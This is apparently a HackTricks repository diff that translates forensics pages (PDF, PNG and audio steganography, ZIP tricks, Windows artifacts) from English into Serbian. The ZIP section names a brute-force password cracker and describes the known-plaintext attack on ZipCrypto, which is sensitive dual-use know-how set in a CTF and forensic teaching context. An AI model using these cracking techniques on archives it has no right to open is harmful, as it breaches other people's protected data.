+- Tekstu iza slika ili preklapajućih slika
+- Neprikazanim komentarima
 
-The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.
-
-For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:
-
-- Invisible layers
-- XMP metadata format by Adobe
-- Incremental generations
-- Text with the same color as the background
-- Text behind images or overlapping images
-- Non-displayed comments
-
-For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
+Za prilagođenu analizu PDF-a, Python biblioteke kao što su [PeepDF](https://github.com/jesparza/peepdf) mogu se koristiti za izradu specijalizovanih skripti za parsiranje. Pored toga, potencijal PDF-a za skladištenje skrivenih podataka je toliko ogroman da resursi poput NSA vodiča o rizicima i protivmera vezanim za PDF, iako više nisu dostupni na svojoj originalnoj lokaciji, i dalje nude dragocene uvide. [Kopija vodiča](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) i kolekcija [trikova za PDF format](https://github.com/corkami/docs/blob/master/PDF/PDF.md) od Ange Albertinija mogu pružiti dodatno čitanje o ovoj temi.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
index 6108df028..d341f989e 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
@@ -1,9 +1,9 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies.
+**PNG fajlovi** su veoma cenjeni u **CTF izazovima** zbog svoje **bezgubitne kompresije**, što ih čini idealnim za ugrađivanje skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlažući njihove podatke unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije.
 
-For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants.
+Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat, koji nudi funkcionalnost putem komandne linije za validaciju i dijagnostiku PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online usluge poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a.
 
-These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data.
+Ove strategije naglašavaju važnost sveobuhvatnog pristupa u CTF-ima, koristeći kombinaciju analitičkih alata i tehnika popravke za otkrivanje i oporavak skrivenih ili izgubljenih podataka.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
index a1e143cb0..d0e581694 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
@@ -1,29 +1,17 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+**Manipulacija audio i video fajlovima** je osnovna komponenta u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati kao što su **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za inspekciju metapodataka fajlova i identifikaciju tipova sadržaja.
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se izdvaja kao vrhunski alat za pregled talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se toplo preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio sadržajem kao što su usporavanje ili preokretanje pesama kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odlično se snalazi u konvertovanju i uređivanju audio fajlova.
 
-{% embed url="https://academy.8ksec.io/" %}
+**Manipulacija najmanje značajnim bitovima (LSB)** je uobičajena tehnika u audio i video steganografiji, koristeći fiksne veličine delova medijskih fajlova za diskretno umetanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseova azbuka**.
 
-**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types.
+Video izazovi često uključuju kontejnerske formate koji kombinuju audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je alat koji se koristi za analizu i manipulaciju ovim formatima, sposoban za de-multiplexing i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše FFmpeg-ove mogućnosti u Python za napredne skriptabilne interakcije.
 
-For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files.
-
-**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**.
-
-Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions.
-
-This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files.
+Ova paleta alata naglašava svestranost potrebnu u CTF izazovima, gde učesnici moraju koristiti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova.
 
 ## References
 
 - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
 
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
index d4e17eb0d..b81a13986 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
@@ -1,20 +1,20 @@
-# ZIPs tricks
+# ZIPs trikovi
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:
+**Alatke za komandnu liniju** za upravljanje **zip datotekama** su neophodne za dijagnostikovanje, popravku i probijanje zip datoteka. Evo nekoliko ključnih alata:
 
-- **`unzip`**: Reveals why a zip file may not decompress.
-- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.
-- **`zipinfo`**: Lists contents of a zip file without extracting them.
-- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.
-- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.
+- **`unzip`**: Otkriva zašto zip datoteka možda ne može da se raspakuje.
+- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip datoteke.
+- **`zipinfo`**: Navodi sadržaj zip datoteke bez vađenja.
+- **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušavaju da poprave oštećene zip datoteke.
+- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje zip lozinki, efikasan za lozinke do oko 7 karaktera.
 
-The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.
+[Specifikacija formata zip datoteka](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip datoteka.
 
-It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
+Važno je napomenuti da zip datoteke zaštićene lozinkom **ne enkriptuju imena datoteka ili veličine datoteka** unutar, što je sigurnosni propust koji RAR ili 7z datoteke ne dele, jer enkriptuju te informacije. Pored toga, zip datoteke enkriptovane starijom metodom ZipCrypto su podložne **napadu u običnom tekstu** ako je dostupna neenkriptovana kopija kompresovane datoteke. Ovaj napad koristi poznati sadržaj za probijanje zip lozinke, ranjivost detaljno opisanu u [HackThis članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dodatno objašnjenu u [ovoj akademskoj studiji](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Međutim, zip datoteke zaštićene **AES-256** enkripcijom su imune na ovaj napad u običnom tekstu, što pokazuje važnost izbora sigurnih metoda enkripcije za osetljive podatke.
 
-## References
+## Reference
 
 - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
 
diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/README.md b/src/forensics/basic-forensic-methodology/windows-forensics/README.md
index 08b2ede8c..052b4c421 100644
--- a/src/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/src/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -1,276 +1,268 @@
-# Windows Artifacts
+# Windows artefakti
 
-## Windows Artifacts
+## Windows artefakti
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+## Generički Windows artefakti
 
-{% embed url="https://websec.nl/" %}
+### Windows 10 obaveštenja
 
-## Generic Windows Artifacts
+U putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows godišnjice) ili `wpndatabase.db` (posle Windows godišnjice).
 
-### Windows 10 Notifications
+Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koja mogu sadržati zanimljive podatke.
 
-In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
+### Hronologija
 
-Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data.
+Hronologija je karakteristika Windows-a koja pruža **hronološku istoriju** web stranica koje su posećene, uređivanih dokumenata i izvršenih aplikacija.
 
-### Timeline
+Baza podataka se nalazi u putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ova baza podataka može se otvoriti sa SQLite alatom ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
 
-Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications.
+### ADS (Alternativni podaci)
 
-The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
+Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je **preuzeta** sa intraneta, interneta itd. Neki softver (kao što su pregledači) obično dodaju čak i **više** **informacija** kao što je **URL** sa kojeg je datoteka preuzeta.
 
-### ADS (Alternate Data Streams)
+## **Backup datoteka**
 
-Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded.
+### Korpa za otpatke
 
-## **File Backups**
+U Vista/Win7/Win8/Win10 **Korpa za otpatke** može se pronaći u fascikli **`$Recycle.bin`** u korenu diska (`C:\$Recycle.bin`).\
+Kada se datoteka obriše u ovoj fascikli, kreiraju se 2 specifične datoteke:
 
-### Recycle Bin
-
-In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\
-When a file is deleted in this folder 2 specific files are created:
-
-- `$I{id}`: File information (date of when it was deleted}
-- `$R{id}`: Content of the file
+- `$I{id}`: Informacije o datoteci (datum kada je obrisana)
+- `$R{id}`: Sadržaj datoteke
 
 ![](<../../../images/image (486).png>)
 
-Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
-
+Imajući ove datoteke, možete koristiti alat [**Rifiuti**](https://github.com/abelcheung/rifiuti2) da dobijete originalnu adresu obrisanih datoteka i datum kada je obrisana (koristite `rifiuti-vista.exe` za Vista – Win10).
 ```
 .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
 ```
-
 ![](<../../../images/image (495) (1) (1) (1).png>)
 
 ### Volume Shadow Copies
 
-Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
+Shadow Copy je tehnologija uključena u Microsoft Windows koja može da kreira **rezervne kopije** ili snimke računarskih datoteka ili volumena, čak i kada su u upotrebi.
 
-These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
+Ove rezervne kopije se obično nalaze u `\System Volume Information` iz korena datotečnog sistema, a naziv se sastoji od **UID-ova** prikazanih na sledećoj slici:
 
 ![](<../../../images/image (520).png>)
 
-Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
+Montiranjem forenzičke slike sa **ArsenalImageMounter**, alat [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) može se koristiti za inspekciju shadow copy-a i čak **izvlačenje datoteka** iz rezervnih kopija shadow copy-a.
 
 ![](<../../../images/image (521).png>)
 
-The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
+Unos u registru `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` sadrži datoteke i ključeve **koje ne treba praviti rezervne kopije**:
 
 ![](<../../../images/image (522).png>)
 
-The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
+Registar `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`.
 
 ### Office AutoSaved Files
 
-You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
+Možete pronaći automatski sačuvane datoteke u: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
 
 ## Shell Items
 
-A shell item is an item that contains information about how to access another file.
+Shell item je stavka koja sadrži informacije o tome kako pristupiti drugoj datoteci.
 
 ### Recent Documents (LNK)
 
-Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
+Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koristi ili kreira datoteku** u:
 
 - Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
 - Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
 
-When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
+Kada se kreira folder, takođe se kreira veza do foldera, do roditeljskog foldera i do foldera bake.
 
-These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
+Ove automatski kreirane datoteke sa linkovima **sadrže informacije o poreklu** kao što su da li je to **datoteka** **ili** **folder**, **MAC** **vremena** te datoteke, **informacije o volumenu** gde je datoteka smeštena i **folder ciljne datoteke**. Ove informacije mogu biti korisne za oporavak tih datoteka u slučaju da su uklonjene.
 
-Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
+Takođe, **datum kreiranja link** datoteke je prvi **put** kada je originalna datoteka **prvi put** **korisćena**, a **datum** **modifikacije** link datoteke je **poslednji** **put** kada je izvorna datoteka korišćena.
 
-To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
+Da biste inspektovali ove datoteke, možete koristiti [**LinkParser**](http://4discovery.com/our-tools/).
 
-In this tools you will find **2 sets** of timestamps:
+U ovom alatu ćete pronaći **2 skupa** vremenskih oznaka:
 
-- **First Set:**
-  1. FileModifiedDate
-  2. FileAccessDate
-  3. FileCreationDate
-- **Second Set:**
-  1. LinkModifiedDate
-  2. LinkAccessDate
-  3. LinkCreationDate.
+- **Prvi skup:**
+1. FileModifiedDate
+2. FileAccessDate
+3. FileCreationDate
+- **Drugi skup:**
+1. LinkModifiedDate
+2. LinkAccessDate
+3. LinkCreationDate.
 
-The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
-
-You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
+Prvi skup vremenskih oznaka se odnosi na **vremenske oznake same datoteke**. Drugi skup se odnosi na **vremenske oznake povezane datoteke**.
 
+Možete dobiti iste informacije pokretanjem Windows CLI alata: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
 ```
 LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
 ```
-
-In this case, the information is going to be saved inside a CSV file.
+U ovom slučaju, informacije će biti sačuvane unutar CSV datoteke.
 
 ### Jumplists
 
-These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
+Ovo su nedavne datoteke koje su označene po aplikaciji. To je lista **nedavnih datoteka korišćenih od strane aplikacije** kojoj možete pristupiti u svakoj aplikaciji. Mogu biti kreirane **automatski ili po meri**.
 
-The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
+**Jumplists** kreirane automatski se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists su imenovane prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije.
 
-The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
+Prilagođeni jumplists se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto **važnog** dogodilo sa datotekom (možda označeno kao omiljeno).
 
-The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**.
+**Vreme kreiranja** bilo kog jumplista označava **prvi put kada je datoteka pristupljena** i **vreme modifikacije poslednji put**.
 
-You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
+Možete pregledati jumplists koristeći [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
 
 ![](<../../../images/image (474).png>)
 
-(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
+(_Napomena da su vremenski oznake koje pruža JumplistExplorer povezane sa samom jumplist datotekom_)
 
 ### Shellbags
 
-[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
+[**Pratite ovaj link da saznate šta su shellbags.**](interesting-windows-registry-keys.md#shellbags)
 
-## Use of Windows USBs
+## Korišćenje Windows USB-a
 
-It's possible to identify that a USB device was used thanks to the creation of:
+Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju:
 
 - Windows Recent Folder
 - Microsoft Office Recent Folder
 - Jumplists
 
-Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
+Napomena da neka LNK datoteka umesto da pokazuje na originalni put, pokazuje na WPDNSE folder:
 
 ![](<../../../images/image (476).png>)
 
-The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
+Datoteke u WPDNSE folderu su kopije originalnih, stoga neće preživeti restart PC-a i GUID se uzima iz shellbaga.
 
 ### Registry Information
 
-[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices.
+[Proverite ovu stranicu da saznate](interesting-windows-registry-keys.md#usb-information) koji registry ključevi sadrže zanimljive informacije o USB povezanim uređajima.
 
 ### setupapi
 
-Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
+Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da dobijete vremenske oznake o tome kada je USB konekcija uspostavljena (potražite `Section start`).
 
 ![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
 
 ### USB Detective
 
-[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
+[**USBDetective**](https://usbdetective.com) može se koristiti za dobijanje informacija o USB uređajima koji su povezani sa slikom.
 
 ![](<../../../images/image (483).png>)
 
 ### Plug and Play Cleanup
 
-The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
+Zakazana aktivnost poznata kao 'Plug and Play Cleanup' prvenstveno je dizajnirana za uklanjanje zastarelih verzija drajvera. Suprotno njenoj specificiranoj svrsi zadržavanja najnovije verzije paketa drajvera, online izvori sugerišu da takođe cilja drajvere koji su bili neaktivni 30 dana. Kao rezultat, drajveri za uklonjive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju.
 
-The task is located at the following path:
+Zadatak se nalazi na sledećem putu:
 `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
 
-A screenshot depicting the task's content is provided:
+Prikazana je slika koja prikazuje sadržaj zadatka:
 ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
 
-**Key Components and Settings of the Task:**
+**Ključne komponente i podešavanja zadatka:**
 
-- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
-- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
+- **pnpclean.dll**: Ova DLL je odgovorna za stvarni proces čišćenja.
+- **UseUnifiedSchedulingEngine**: Podešeno na `TRUE`, što ukazuje na korišćenje generičkog planera zadataka.
 - **MaintenanceSettings**:
-  - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
-  - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
+- **Period ('P1M')**: Usmerava Planer zadataka da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja.
+- **Deadline ('P2M')**: Upravlja Planerom zadataka, ako zadatak ne uspe dva uzastopna meseca, da izvrši zadatak tokom hitnog automatskog održavanja.
 
-This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
+Ova konfiguracija osigurava redovno održavanje i čišćenje drajvera, sa odredbama za ponovni pokušaj zadatka u slučaju uzastopnih neuspeha.
 
-**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
+**Za više informacija proverite:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
 
 ## Emails
 
-Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
+Emailovi sadrže **2 zanimljiva dela: zaglavlja i sadržaj** emaila. U **zaglavljima** možete pronaći informacije kao što su:
 
-- **Who** sent the emails (email address, IP, mail servers that have redirected the email)
-- **When** was the email sent
+- **Ko** je poslao emailove (email adresa, IP, mail serveri koji su preusmerili email)
+- **Kada** je email poslat
 
-Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
+Takođe, unutar `References` i `In-Reply-To` zaglavlja možete pronaći ID poruka:
 
 ![](<../../../images/image (484).png>)
 
 ### Windows Mail App
 
-This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
+Ova aplikacija čuva emailove u HTML-u ili tekstu. Možete pronaći emailove unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa `.dat` ekstenzijom.
 
-The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
+**Metapodaci** emailova i **kontakti** mogu se naći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
 
-**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails.
+**Promenite ekstenziju** datoteke sa `.vol` na `.edb` i možete koristiti alat [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) da je otvorite. Unutar `Message` tabele možete videti emailove.
 
 ### Microsoft Outlook
 
-When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
+Kada se koriste Exchange serveri ili Outlook klijenti, biće prisutni neki MAPI zaglavlja:
 
-- `Mapi-Client-Submit-Time`: Time of the system when the email was sent
-- `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread
-- `Mapi-Entry-ID`: Message identifier.
-- `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?)
+- `Mapi-Client-Submit-Time`: Vreme sistema kada je email poslat
+- `Mapi-Conversation-Index`: Broj poruka u thread-u i vremenska oznaka svake poruke u thread-u
+- `Mapi-Entry-ID`: Identifikator poruke.
+- `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nije pročitana? odgovoreno? preusmereno? van kancelarije?)
 
-In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in:
+U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru čuvaju se u PST datoteci u:
 
 - `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
 - `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
 
